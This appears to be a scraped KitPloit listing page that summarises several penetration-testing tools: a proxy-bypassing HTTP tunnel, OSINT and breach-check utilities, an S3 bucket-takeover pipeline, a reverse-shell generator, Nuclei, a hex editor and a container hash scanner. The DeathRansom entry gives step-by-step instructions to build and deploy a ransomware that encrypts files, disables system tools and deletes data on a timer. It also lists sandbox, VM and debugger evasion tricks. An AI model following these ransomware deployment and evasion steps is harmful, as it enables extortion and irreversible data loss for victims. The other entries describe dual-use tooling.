Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Wotop - Web On Top Of Any Protocol

$
0
0

WOTOP is a tool meant to tunnel any sort of traffic over a standard HTTP channel.
Useful for scenarios where there's a proxy filtering all traffic except standard HTTP(S) traffic. Unlike other tools which either require you to be behind a proxy which let's you pass arbitrary traffic (possibly after an initial CONNECT request), or tools which work only for SSH, this imposes no such restrictions.

Working
Assuming you want to use SSH to connect to a remote machine where you don't have root privileges.
There will be 7 entities:
  1. Client (Your computer, behind the proxy)
  2. Proxy (Evil)
  3. Target Server (The remote machine you want to SSH to, from Client)
  4. Client WOTOP process
  5. Target WOTOP process
  6. Client SSH process
  7. Target SSH process
If there was no proxy, the communication would be something like:
Client -> Client SSH process -> Target Server -> Target SSH process
In this scenario, here's the proposed method:
Client -> Client SSH process -> Client WOTOP process -> Proxy -> Target WOTOP process -> Target SSH process -> Target Server
WOTOP simply wraps all the data in HTTP packets, and buffers them accordingly.
Another even more complicated scenario would be if you have an external utility server, and need to access another server's resources from behind a proxy. In this case, wotop will still run on your external server, but instead of using localhost in the second command (Usage section), use the hostname of the target machine which has the host.

Usage
On the client machine:
./wotop <client-hop-port> <server-host-name> <server-hop-port>
On the target machine:
./wotop <server-hop-port> localhost <target-port> SERVER
(Note the keyword SERVER at the end)
In case of SSH, the target-port would be 22. Now once these 2 are running, to SSH you would run the following:
ssh <target-machine-username>@localhost -p <client-hop-port>
Note: The keyword server tells wotop which side of the connection has to be over HTTP.

Planned features
  • Better and adaptive buffering
  • Better CLI flags interface
  • Optional encrypting of data
  • Parsing of .ssh/config file for hosts
  • Web interface for remote server admin
  • Web interface for local host
  • Daemon mode for certain configs

Bugs
  • Currently uses a 100ms sleep after every send/receive cycle to bypass some memory error (not yet eliminated).
  • HTTP Responses may come before HTTP Requests. Let me know if you know of some proxy which blocks such responses.
  • Logger seems to be non-thread-safe, despite locking. Leads to memory errors, and thus disabled for now.



Should-I-Trust - OSINT Tool To Evaluate The Trustworthiness Of A Company

$
0
0

should-i-trust is a tool to evaluate OSINT signals for a domain.

Requirements

should-i-trust requires API keys from the following sources:
Censys.io - Free for for first 250/quries/month
VirusTotal - Free
GrayHatWarFare - Free with limited results

Use Case
You're part of a review board that's responsible for evaluating new vendors. You're specifically responsible for ensuring new vendors meet compliance and security requirements.
Standard operation procedure is to ask for one or all of the following: SOC report, VSAQ, CAIQ, SIG/SIG-Lite. All vendors will not have these reports and/or questionnaire answers. Maybe it's org process to deny vendor intake without this information, or maybe, this is a "special" engagement and you need to ascertain trustworthyness without the docs. Maybe you don't trust the response in the docs.
should-i-trust is a tool to go beyond standard responses and look for signals that the organization should not be trusted. Maybe they're exposing their CI/CD to the internet with no auth. Maybe they have an EC2 instance with prod code running and no directory restrictions.
should-i-trust doesn't provide all the information you will need to make a go/no-go decision but it will allow you to quickly gather OSINT data for further evaluation.
should-i-trust is also useful for red team or similar engagements. It can quickly identify targets to probe.

Setup

Either install the chrome extension through chrome or download and manually install in chrome using developer mode.

Running
Open the extension
Enter your API keys (required once)
Enter a domain to query

Output
  • If there's an indicator the domain participates in a bug bounty program
  • Domains found through VirusTotal, Censys.io, and the Google Cert Transparency Report
  • IPs and open ports found through Censys.io
  • Repositories found on GitHub, GitLab, and Bitbucket
  • Misc data found on virustotal.com
  • AWS bucket files found exposed through GrayHatWarfare

Road Map
TBD


Project iKy v2.5.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface

$
0
0

Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

Python stuff and Celery

You must install the libraries inside requirements.txt
python3 -m pip install-r requirements.txt

Install Frontend

Node

First of all, install nodejs.

Dependencias

Inside the directory frontend install the dependencies
cd frontend
npm install

Wake up iKy Tool

Turn on Backend

Redis

Turn on the server in a terminal
redis-server

Python stuff and Celery

Turn on Celery in another terminal, within the directory backend
./celery.sh
Again, in another terminal turn on backend app from directory backend
python3 app.py

Turn on Frontend

Finally, to run frontend server, execute the following command from directory frontend
npm start

Screen after turn on iKy


Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded
  • HaveIBeenPwned : Generate the APIs from here (Paid)
  • Emailrep.io : Generate the APIs from here

Wiki



Demo Videos


iKy eko15


iKy Version 2


Testing iKy with Emiliano


Testing iKy with Giba


iKy version 1

iKy version 0

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).
Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.
Consider that all the information collected is free and available online, the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show "nice" things that you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue, contact us by e-mail or by any of the RRSS, but keep in mind that my mother is neither the creator nor Contribute to the project.
We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and / or this disclaimer clearly.
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.


Pwned - Simple CLI Script To Check If You Have A Password That Has Been Compromised In A Data Breach

$
0
0

Pwned is a simple command-line python script to check if you have a password that has been compromised in a data breach. This script uses haveibeenpwned API to check whether your passwords were leaked during one of the many breaches of online services.
This API uses k-Anonymity model that allows a password to be searched for by partial hash in order to anonymously verify if a password was leaked without disclosing the searched password.

How pwned script works

Git Installation
# clone the repo
$ git clone https://github.com/sameera-madushan/Pwned.git

# change the working directory to Pwned
$ cd Pwned

# install the requirements
$ pip3 install -r requirements.txt

Usage
python pwned.py -p <your password here>

Support & Contributions
  • Please ⭐️ this repository if this project helped you!
  • Contributions of any kind welcome!

License
MIT ©sameera-madushan


S3Reverse - The Format Of Various S3 Buckets Is Convert In One Format

$
0
0

The format of various s3 buckets is convert in one format. for bugbounty and security testing.

Install
$ go get -u github.com/hahwul/s3reverse  

Usage

Input options
Basic Usage

8""""8 eeee 8"""8 8"""" 88 8 8"""" 8"""8 8""""8 8""""
8 8 8 8 8 88 8 8 8 8 8 8
8eeeee 8 8eee8e 8eeee 88 e8 8eeee 8eee8e 8eeeee 8eeee
88 eee8 eeee 88 8 88 "8 8 88 88 8 88 88
e 88 88 88 8 88 8 8 88 88 8 e 88 88
8eee88 eee88 88 8 88eee 8ee8 88eee 88 8 8eee88 88eee

by @hahwul

Usage of ./s3reverse:
-iL string
input List
-oA string
Write output in Array format (optional)
-oN string
Write output in Normal format (optional)
-tN
to name
-tP
to path-style
-tS
to s3 url
-tV
to virtual-hosted-style
-verify
testing bucket(acl,takeover)

Using from file
$ s3reverse -iL sample -tN
udemy-web-upload-transitional
github-cloud
github-production-repository-file-5c1aeb
github-production-upload-manifest-file-7fdce7
github-production-user-asset-6210df
github-education-web
github-jobs
s3-us-west-2.amazonaws.com
optimizely
app-usa-modeast-prod-a01239f
doc
swipely-merchant-assets
adslfjasldfkjasldkfjalsdfkajsljasldf
cbphotovideo
cbphotovideo-eu
public.chaturbate.com
wowdvr
cbvideoupload
testbuckettesttest

Using from pipeline
$ cat sample | s3reverse -tN
udemy-web-upload-transitional
github-cloud
github-production-repository-file-5c1aeb
github-production-upload-manifest-file-7fdce7
github-production-user-asset-6210df
github-education-web
github-jobs
s3-us-west-2.amazonaws.com
optimizely
app-usa-modeast-prod-a01239f
doc
swipely-merchant-assets
adslfjasldfkjasldkfjalsdfkajsljasldf
cbphotovideo
cbphotovideo-eu
public.chaturbate.com
wowdvr
cbvideoupload
testbuckettesttest

Output options
to Name
$ s3reverse -iL sample -tN
udemy-web-upload-transitional
github-cloud
github-production-repository-file-5c1aeb
github-production-upload-manifest-file-7fdce7
... snip ...

to Path Style
$ s3reverse -iL sample -tP
https://s3.amazonaws.com/udemy-web-upload-transitional
https://s3.amazonaws.com/github-cloud
https://s3.amazonaws.com/github-production-repository-file-5c1aeb
... snip ...

to Virtual Hosted Style
$ s3reverse -iL sample -tV
udemy-web-upload-transitional.s3.amazonaws.com
github-cloud.s3.amazonaws.com
github-production-repository-file-5c1aeb.s3.amazonaws.com
github-production-upload-manifest-file-7fdce7.s3.amazonaws.com
github-production-user-asset-6210df.s3.amazonaws.com
... snip ...

Verify mode
$ s3reverse -iL sample -verify
[NoSuchBucket] adslfjasldfkjasldkfjalsdfkajsljasldf
[PublicAccessDenied] github-production-user-asset-6210df
[PublicAccessDenied] github-jobs
[PublicAccessDenied] public.chaturbate.com
[PublicAccessDenied] github-education-web
[PublicAccessDenied] github-production-repository-file-5c1aeb
[PublicAccessDenied] testbuckettesttest
[PublicAccessDenied] app-usa-modeast-prod-a01239f
[PublicAccessGranted] cbphotovideo-eu
[PublicAccessDenied] swipely-merchant-assets
[PublicAccessDenied] optimizely
[PublicAccessDenied] wowdvr
[PublicAccessGranted] s3-us-west-2.amazonaws.com
[PublicAccessDenied] cbphotovideo
[PublicAccessDenied] cbvideoupload
[PublicAccessDenied] github-production-upload-manifest-file-7fdce7
[PublicAccessDenied] doc
[PublicAccessDenied] udemy-web-upload-transitional
[PublicAccessDenied] github-cloud

Case study
Pipelining meg, s3reverse, gf , s3scanner for Find S3 Misconfiguration.
$ meg -d 1000 -v / ; cd out ; gf s3-buckets | s3reverse -tN > buckets ; s3scanner buckets  
Find S3 bucket takeover
$ meg -d 1000 -v / ; cd out ; gf s3-buckets | s3reverse -verify | grep NoSuchBucket > takeovers  


Print-My-Shell - Tool To Automate The Process Of Generating Various Reverse Shells

$
0
0

"Print My Shell" is a python script, wrote to automate the process of generating various reverse shells based on PayloadsAllTheThings and Pentestmonkey reverse shell cheat sheets.
Using this script you can easily generate various types of reverse shells without leaving your command line. This script will come in handy when you are playing CTF like challenges.

Available Shell Types
  • Bash
  • Perl
  • Ruby
  • Golang
  • Netcat
  • Ncat
  • Powershell
  • Awk
  • Lua
  • Java
  • Socat
  • Nodejs
  • Telnet
  • Python

Git Installation
# clone the repo
$ git clone https://github.com/sameera-madushan/Print-My-Shell.git

# change the working directory to Print-My-Shell
$ cd Print-My-Shell

Usage
usage: shell.py [-h] [-i IPADDR] [-p PORTNUM] [-t TYPE] [-l] [-a]

optional arguments:
-h, --help show this help message and exit
-i IPADDR, --ip IPADDR
IP address
-p PORTNUM, --port PORTNUM
Port number
-t TYPE, --type TYPE Type of the reverse shell to generate
-l, --list List all available shell types
-a, --all Generate all the shells

Support & Contributions
  • Please ⭐️ this repository if this project helped you!
  • Contributions of any kind welcome!

License
MIT ©sameera-madushan

References
Payloads All The Things Reverse Shell Cheat Sheet
Pentestmonkey Reverse Shell Cheat Sheet


Nuclei - Nuclei Is A Fast Tool For Configurable Targeted Scanning Based On Templates Offering Massive Extensibility And Ease Of Use

$
0
0

Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use.
Nuclei is used to send requests across targets based on a template leading to zero false positives and providing effective scanning for known paths. Main use cases for nuclei are during initial reconnaissance phase to quickly check for low hanging fruits or CVEs across targets that are known and easily detectable. It uses retryablehttp-go library designed to handle various errors and retries in case of blocking by WAFs, this is also one of our core modules from custom-queries.
We have also open-sourced a dedicated repository to maintain various type of templates, we hope that you will contribute there too. Templates are provided in hopes that these will be useful and will allow everyone to build their own templates for the scanner. Checkout the guide at GUIDE.md for a primer on nuclei templates.

Features
  • Simple and modular code base making it easy to contribute.
  • Fast And fully configurable using a template based engine.
  • Handles edge cases doing retries, backoffs etc for handling WAFs.
  • Smart matching functionality for zero false positive scanning.

Usage
nuclei -h
This will display help for the tool. Here are all the switches it supports.
FlagDescriptionExample
-cNumber of concurrent requests (default 10)nuclei -c 100
-lList of urls to run templatesnuclei -l urls.txt
-tTemplates input file/files to check across hostsnuclei -t git-core.yaml
-tTemplates input file/files to check across hostsnuclei -t "path/*.yaml"
-nCDon't Use colors in outputnuclei -nC
-oFile to save output result (optional)nuclei -o output.txt
-silentShow only found results in outputnuclei -silent
-retriesNumber of times to retry a failed request (default 1)nuclei -retries 1
-timeoutSeconds to wait before timeout (default 5)nuclei -timeout 5
-vShow Verbose outputnuclei -v
-versionShow version of nucleinuclei -version

Installation Instructions

From Binary
The installation is easy. You can download the pre-built binaries for your platform from the Releases page. Extract them using tar, move it to your $PATHand you're ready to go.
> tar -xzvf nuclei-linux-amd64.tar
> mv nuclei-linux-amd64 /usr/bin/nuclei
> nuclei -h

From Source
nuclei requires go1.13+ to install successfully. Run the following command to get the repo -
> GO111MODULE=on go get -u -v github.com/projectdiscovery/nuclei/cmd/nuclei
In order to update the tool, you can use -u flag with go get command.

Running nuclei

1. Running nuclei with a single template.
This will run the tool against all the hosts in urls.txt and returns the matched results.
> nuclei -l urls.txt -t git-core.yaml -o results.txt
You can also pass the list of hosts at standard input (STDIN). This allows for easy integration in automation pipelines.
This will run the tool against all the hosts in urls.txt and returns the matched results.
> cat urls.txt | nuclei -t git-core.yaml -o results.txt

2. Running nuclei with multiple templates.
This will run the tool against all the hosts in urls.txt with all the templates in the path-to-templates directory and returns the matched results.
> nuclei -l urls.txt -t "path-to-templates/*.yaml" -o results.txt 

3. Automating nuclei with subfinder and any other similar tool.
> subfinder -d hackerone.com | httprob | nuclei -t "path-to-templates/*.yaml" -o results.txt
Nuclei supports glob expression ending in .yaml meaning multiple templates can be easily passed to be executed one after the other. Please refer to this guide to build your own custom templates.

Thanks
nuclei is made with love by the projectdiscovery team. Community contributions have made the project what it is. See the Thanks.md file for more details. Do also check out these similar awesome open-source projects that may fit in your workflow:
https://github.com/jaeles-project/jaeles
https://github.com/ameenmaali/qsfuzz
https://github.com/proabiral/inception
https://github.com/hannob/snallygaster


DeathRansom - A Ransomware Developed In Python, With Bypass Technics, For Educational Purposes

$
0
0

What is a ransomware?
A ransomware is malware that encrypts all your files and shows a ransom request, which tells you to pay a set amount, usually in bitcoins (BTC), in a set time to decrypt your files, or he will delete your files.

How it works?
First, the script checks if it's in a sandbox, debugger, vm, etc, and try bypass it.
It then encrypts all files starting with the defined directory on the line 60 in deathransom.py.
Then, downloads the ransom request script, disable cmd, taskmanager and the registry tools. And starts the counter to delete the files.

How to use?
Install the requiriments typing: pip install -r requirements.txt and python3 -m pip install PyQt5
Generate the keys, upload the public key to pastebin, copy the raw link, and change the site on the line 7 in deathransom.py python generate_key.py
Transform time_script.py and main.py(Located at Ransom Request) into exe.
Transform the time_script into exe using pyinstaller in python2 version typing pyinstaller --onefile --windowed <FILE>
To transform the main of ransom request we will use the pyinstaller in the python3 version pyinstaller --onefile --windowed main.py
Then uploads the scripts to any file hosting service and change the links on the line 28 and 31 in deathransom.py
So just transform deathransom.py into exe using pyinstaller in python2 version and be happy :D

Bypass Technics

  • Anti-Disassembly
Creates several variables to try to make disassembly difficult.

  • Anti-Debugger
Checks if a debugger is active using the ctypes function: windll.kernel32.IsDebuggerPresent()

  • Anti-Vm
Checks if the machine's mac is the same as the standard vms mac.

  • Anti-Sandbox
  • Sleep-Acceleration
Some sandboxes speed up sleep, this function checks if nothing out of the ordinary has occurred.
  • Sandbox in Process
Checks if have any sandbox in running processes
  • Display-Prompt
Shows a message, if the user interact with the pop up, the malware will be executed.
  • Idle-Time
Sleeps for a while and proceed. Some sandboxes wait for a while and stop running, that tries to bypass this.
  • Check-Click
If the user does not click the number of times necessary the malware not will be executed.
  • Check-Cursor-Pos
If the user not move the mouse in a seted time the malware not be executed.

How to edit the Ransom Request
To edit, you need install the PySide2. Open the main.ui file, and edit what you want.

Demonstration Video


Video de demonstração PT-BR




wxHexEditor - Hex Editor / Disk Editor for Huge Files or Devices on Linux, Windows and MacOSX

$
0
0

wxHexEditor is another Free Hex Editor, build because there is no good hex editor for Linux system, specially for big files.

Low Level Data Recovery with wxHexEditor

    wxHexEditor is not an ordinary hex editor, but could work as low level disk editor too.
If you have problems with your HDD or partition, you can recover your data from HDD or from partition via editing sectors in raw hex.
You can edit your partition tables or you could recover files from File System by hand with help of wxHexEditor.
Or you might want to analyze your big binary files, partitions, devices... If you need a good reverse engineer tool like a good hex editor, you welcome.
wxHexEditor could edit HDD/SDD disk devices or partitions in raw up to exabyte sizes.

Features
  • It uses 64 bit file descriptors (supports files or devices up to 2^64 bytes , means some exabytes but tested only 1 PetaByte file (yet). ).
  • It does NOT copy whole file to your RAM. That make it FAST and can open files (which sizes are Multi Giga < Tera < Peta < Exabytes)
  • You can work with delete/insert bytes to file, more than once, without creating temp file!.
  • Could open your devices on Linux, Windows or MacOSX.
  • Memory Usage : Currently ~25 MegaBytes while opened multiple > ~8GB files.
  • Could operate with file thru XOR encryption.
  • Has multiple views to show multiple files in same time.
  • Has x86 disassembly support (via integrated udis86 library) to hack things little faster.
  • Has colourfull tags to make reverse engineering easier and more fun.
  • You can copy/edit your Disks, HDD Sectors with it.( Usefull for rescue files/partitions by hand. )
  • Sector Indication on Disk devices, also has Go to Sector dialog...
  • Formated CopyAs! It's easy to copy part of a file in HEX format for C/C++ source, ASM source, also supports HTML,phpBB and Wiki page formats with TAGs!!
  • Supports Hex or Text editor alone operation.Also can disable Offset region.
  • Supports customizeable hex panel formatting and colors.
  • Allows Linux Process Memory Editing operations
  • Comparison of binary files, allows merge of near results.
  • Supports ***many*** encodings including almost all DOS/Windows/MacOS CPs and multi-character sets like UTF8/16/32, Shift JIS, GBK, EUC_KR...
  • Decimal, Hexadecimal, Octal and LBA ("Sector+Offset") addressing modes, (switchable one to another by right click of mouse on Offset panel.
  • Save selection as a dump file feature for make life easier.
  • "Find Some Bytes" feature for quickly find next meaningful bytes at file/Disk
  • MD/RIPEMD/SHA/TIGER/HAVAL/CRC/ADLER/GOST/WHRILPOOL/SNEFRU checksum functions (via integrated mhash library.)
  • Import & Export TAGs support from file.
  • Written with C++/wxWidgets GUI libs and can be used with other OSes such as Mac OS, Windows as native application.

Compilation instructions
Just launch make!

Compilation dependencies on Linux
  • wxgtk;

wxHexEditor Wiki!

Where is the documentation of the wxHexEditor? At no where. Until now.
You can find shortcuts of wxHexEditor at this wiki page


Terrier - A Image And Container Analysis Tool To Identify And Verify The Presence Of Specific Files According To Their Hashes

$
0
0

Terrier is a Image and Containeranalysis tool that can be used to scan OCI images and Containers to identify and verify the presence of specific files according to their hashes. A detailed writeup of Terrier can be found on the Heroku blog, https://blog.heroku.com/terrier-open-source-identifying-analyzing-containers.

Installation

Binaries
For installation instructions from binaries please visit the Releases Page.

Via Go
$ go get github.com/heroku/terrier

Building from source
Via go
$ go build
or
$ make all

Usage
$ ./terrier -h
Usage of ./terrier:
-cfg string
Load config from provided yaml file (default "cfg.yml")
An OCI TAR of the image to be scanned is required, this is provided to Terrier via the "Image" value in the cfg.yml.
The following Docker command can be used to convert a Docker image to a TAR that can be scanned by Terrier.
# docker save imageid -o image.tar
$ ./terrier 
[+] Loading config: cfg.yml
[+] Analysing Image
[+] Docker Image Source: image.tar
[*] Inspecting Layer: 05c3c2c60920f68b506d3c66e0f6148b81a8b0831388c2d61be5ef02190bcd1f
[!] All components were identified and verified: (493/493)

Example YML config
Terrier parses YAML, below is an example config.
#THIS IS AN EXAMPLE CONFIG, MODIFY TO YOUR NEEDS

mode: image
image: image.tar
# mode: container
# path: merged
# verbose: true
# veryverbose: true

files:
- name: '/usr/bin/curl'
hashes:
- hash: '2353cbb7b47d0782ba8cdd9c7438b053c982eaaea6fbef8620c31a58d1e276e8'
- hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2aaa'
- hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'
- hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521faa'
- name: '/usr/bin/go'
hashes:
- hash: '2353cbb7b47d0782ba8cdd9c7438b053c982eaaea6fbef8620c31a58d1e276e8'

#UNCOMMENT TO ANALYZE HASHES
# hashes:
# - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521faa'
# - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2aa'
# - hash: '60a2c86db4523e5d3eb4 1a247b4e7042a21d5c9d483d59053159d9ed50c8aa41aa'

What does Terrier do?
Terrier is a CLI tool that allows you to:
  • Scan an OCI image for the presence of one or more files that match one or more provided SHA256 hashes
  • Scan a running Container for the presence of one or more files that match one or more provided SHA256 hashes

What is Terrier useful for?

Scenario 1
Terrier can be used to verify if a specific OCI image is making use of a specific binary, which useful in a supply chain verification scenario. For example, we may want to check that a specific Docker image is making use of a specific version or versions of cURL. In this case, Terrier is supplied with the SHA256 hashes of the binaries that are trusted.
An example YAML file for this scenario might look like this:
mode: image
# verbose: true
# veryverbose: true
image: golang1131.tar

files:
- name: '/usr/local/bin/analysis.sh'
hashes:
- hash: '9adc0bf7362bb66b98005aebec36691a62c80d54755e361788c776367d11b105'
- name: '/usr/bin/curl'
hashes:
- hash: '23afbfab4f35ac90d9841a6e05f0d1487b6e0c3a914ea8dab3676c6dde612495'
- name: '/usr/local/bin/staticcheck'
hashes:
- hash: '73f89162bacda8dd2354021dc56dc2f3dba136e873e372312843cd895dde24a2'

Scenario 2
Terrier can be used to verify the presence of a particular file or files in a OCI image according to a set of provided hashes. This can be useful to check if an OCI image contains a malicious file or a file that is required to be identified.
An example YAML file for this scenario might look like this:
mode: image
# verbose: true
# veryverbose: true
image: alpinetest.tar
hashes:
- hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
- hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2'
- hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41'
- hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'

Scenario 3
Terrier can be used to verify the components of Containers at runtime by analysing the contents of /var/lib/docker/overlay2/.../merged An example YAML file for this scenario might look like this:
mode: container
verbose: true
# veryverbose: true
# image: latestgo13.tar
path: merged

files:
- name: '/usr/local/bin/analysis.sh'
hashes:
- hash: '9adc0bf7362bb66b98005aebec36691a62c80d54755e361788c776367d11b105'
- name: '/usr/local/go/bin/go'
hashes:
- hash: '23afbfab4f35ac90d9841a6e05f0d1487b6e0c3a914ea8dab3676c6dde612495'
- name: '/usr/local/bin/staticcheck'
hashes:
- hash: '73f89162bacda8dd2354021dc56dc2f3dba136e873e372312843cd895dde24a2'
- name: '/usr/local/bin/gosec'
hashes:
- hash: 'e7cb8304e032ccde8e342a7f85ba0ba5cb0b8383a09a77ca282793ad7e9f8c1f'
- name: '/usr/local/bin/errcheck'
hashes:
- hash: '41f725d7a872cad4ce1f403938937822572e0a38a51e8a1b29707f5884a2f0d7'
- name: '/var/lib/dpkg/info/apt.postrm'
hashes:
- hash: '6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c'

Usage

Example 1
Terrier is a CLI and makes use of YAML. An example YAML config:
mode: image
# verbose: true
# veryverbose: true
image: alpinetest.tar
files:
- name: '/usr/local/go/bin/go'
hashes:
- hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
- hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2aaa'
- hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41aaa'
- hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521faa'
- name: '/usr/bin/delpart'
hashes:
- hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96aaa'
- name: '/usr/bin/stdbuf'
hashes:
- hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521faa'
- hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2aa'
- hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41aa'
In the example below, Terrier has being instructed via the YAML above to verify multiple files.
$./terrier 
[+] Loading config: cfg.yml
[+] Analysing Image
[+] Docker Image Source: alpinetest.tar
[*] Inspecting Layer: 05c3c2c60920f68b506d3c66e0f6148b81a8b0831388c2d61be5ef02190bcd1f
[*] Inspecting Layer: 09c25a178d8a6f8b984f3e72ca5ec966215b24a700ed135dc062ad925aa5eb23
[*] Inspecting Layer: 36351e8e1da92268d40245cfbcd499a1173eeacc23be428386c8fc0a16f0b10a
[*] Inspecting Layer: 7224ca1e886eeb7e63a9e978b1a811ed52f4a53ccb65f7c510fa04a0d1103fdf
[*] Inspecting Layer: 7a2e464d80c7a1d89dab4321145491fb94865099c59975cfc840c2b8e7065014
[*] Inspecting Layer: 88a583fe02f250344f89242f88309c666671042b032411630de870a111bea971
[*] Inspecting Layer: 8db14b6fdd2cf8b4c122824531a4d85e07f1fecd6f7f43eab7f2d0a90d8c4bf2
[*] Inspecting Layer: 9196e3376d1ed69a647e728a444662c10ed21feed4ef7aaca0d10f452240a09a
[*] Inspecting Layer: 92db9b9e59a64cdf486203189d02acff79c3360788b62214a49d2263874ee811
[*] Inspecting Layer: bc4bb4a45da628724c9 f93400a9149b2dd8a5d437272cb4e572cfaec64512d98
[*] Inspecting Layer: be7d600e4e8ed3000e342ef6482211350069d935a14aeff4d9fc3289e1426ed3
[*] Inspecting Layer: c4cec85dfa44f0a8856064922cff1c39b872b506dd002e33664d11a80f75a149
[*] Inspecting Layer: c998d6f023b7b9e3c186af19bcd1c2574f0d01b943077281ac5bd32e02dc57a5
[!] All components were identified and verified: (493/493)
Terrier sets its return code depending on the result of the tests, in the case of the test above, the return code will be "0" which indicates a successful test as 1 instance of each provided component was identified and verified.

Example 2
Terrier is instructed to identify any files in the provided image that match the provided SHA256 hashes. YAML file cfg.yml
mode: image
# verbose: true
# veryverbose: true
image: 1070caa1a8d89440829fd35d9356143a9d6185fe7f7a015b992ec1d8aa81c78a.tar
hashes:
- hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
- hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2'
- hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41'
- hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'
Running Terrier.
./terrier 
[+] Loading config: cfg.yml
[+] Docker Image Source: golang.tar
[*] Inspecting Layer: 1070caa1a8d89440829fd35d9356143a9d6185fe7f7a015b992ec1d8aa81c78a
[*] Inspecting Layer: 414833cdb33683ab8607565da5f40d3dc3f721e9a59e14e373fce206580ed40d
[*] Inspecting Layer: 6bd93c6873c822f793f770fdf3973d8a02254a5a0d60d67827480797f76858aa
[*] Inspecting Layer: c40c240ae37a2d2982ebcc3a58e67bf07aeaebe0796b5c5687045083ac6295ed
[*] Inspecting Layer: d2850df0b6795c00bdce32eb9c1ad9afc0640c2b9a3e53ec5437fc5539b1d71a
[*] Inspecting Layer: f0c2fe7dbe3336c8ba06258935c8dae37dbecd404d2d9cd74c3587391a11b1af
[!] Found file 'f0c2fe7dbe3336c8ba06258935c8dae37dbecd404d2d9cd74c3587391a11b1af/usr/bin/curl' with hash: 9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96
[*] Inspecting Layer: f2d913644763b53196cfd2597f21b9739535ef9d5bf9250b9fa21ed223fc29e3
echo $?
1

Example 3
Terrier is instructed to analyze and verify the contents of the container's merged contents located at "merged" where merged is possibly located at /var/lib/docker/overlay2/..../merged . An example YAML file for this scenario might look like this:
mode: container
verbose: true
# veryverbose: true
# image: latestgo13.tar
path: merged

files:
- name: '/usr/local/bin/analysis.sh'
hashes:
- hash: '9adc0bf7362bb66b98005aebec36691a62c80d54755e361788c776367d11b105'
- name: '/usr/local/go/bin/go'
hashes:
- hash: '23afbfab4f35ac90d9841a6e05f0d1487b6e0c3a914ea8dab3676c6dde612495'
- name: '/usr/local/bin/staticcheck'
hashes:
- hash: '73f89162bacda8dd2354021dc56dc2f3dba136e873e372312843cd895dde24a2'
- name: '/usr/local/bin/gosec'
hashes:
- hash: 'e7cb8304e032ccde8e342a7f85ba0ba5cb0b8383a09a77ca282793ad7e9f8c1f'
- name: '/usr/local/bin/errcheck'
hashes:
- hash: '41f725d7a872cad4ce1f403938937822572e0a38a51e8a1b29707f5884a2f0d7'
- name: '/var/lib/dpkg/info/apt.postrm'
hashes:
- hash: '6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c'
Running Terrier to analyse the running Container.
[+] Loading config: cfg.yml
[+] Analysing Container
[!] Found matching instance of '/usr/local/bin/analysis.sh' at: merged/usr/local/bin/analysis.sh with hash:9adc0bf7362bb66b98005aebec36691a62c80d54755e361788c776367d11b105
[!] Found matching instance of '/usr/local/bin/errcheck' at: merged/usr/local/bin/errcheck with hash:41f725d7a872cad4ce1f403938937822572e0a38a51e8a1b29707f5884a2f0d7
[!] Found matching instance of '/usr/local/bin/gosec' at: merged/usr/local/bin/gosec with hash:e7cb8304e032ccde8e342a7f85ba0ba5cb0b8383a09a77ca282793ad7e9f8c1f
